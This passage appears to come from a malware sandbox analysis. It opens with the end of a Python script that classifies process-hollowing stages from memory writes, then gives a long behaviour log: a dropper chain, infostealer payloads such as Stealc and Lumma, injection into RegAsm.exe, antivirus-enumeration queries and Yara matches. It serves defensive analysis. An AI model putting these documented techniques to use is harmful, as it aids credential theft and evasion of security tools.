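            "peb_imagebase_patch": any(l.startswith("page+0x8") for _, l in labeled),
        }
        hits = sum(stages.values())
        if hits == 4:
            verdict = "process hollowing / RunPE (all stages observed)"
        elif hits >= 2:
            verdict = "probable PE injection (%d of 4 stages)" % hits
        else:
            verdict = "inconclusive"
        report[key] = {"rwx_bases": rwx, "writes": labeled, "stages": stages, "verdict": verdict}
    return report


if __name__ == "__main__":
    for (inj, tgt), s in reconstruct(EVENTS).items():
        print(f"{inj} -> {tgt}: {s['verdict']}")
        for addr, label in s["writes"]:
            print(f"  {addr:#010x}  {label}")
```

The same grouping applied to the full report also shows what is missing: no `Memory allocated` line precedes the writes at `0x402000` and above, so they land inside the single `0x400000` region, which is exactly what copying a PE's sections into one reserved image would produce.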
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 17_2_00E51201
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 17_2_00E32BA5
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5B226 SendInput,keybd_event, 17_2_00E5B226
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 17_2_00E722DA
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 17_2_00E50B62
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 17_2_00E51663
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: BProgram Manager
Source: 6dbb7bdf47.exe Binary or memory string: Shell_TrayWnd
Source: 3ec4738210.exe, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 9Program Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: .vProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCD3E2 cpuid 11_2_00DCD3E2
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000018042\blo.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 11_2_00DCCBEA
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E4D27A GetUserNameW, 17_2_00E4D27A
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 17_2_00E2B952
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3771028122.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 28.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.610cd559ac.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.file.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1352623579.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2089661467.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1277581266.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3749392978.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1987821507.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2132345556.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.1945297773.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1312296599.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1925680641.00000000000E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.2690915985.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1452499164.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2741378839.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.1946658901.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.1885515437.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Source: Yara match File source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
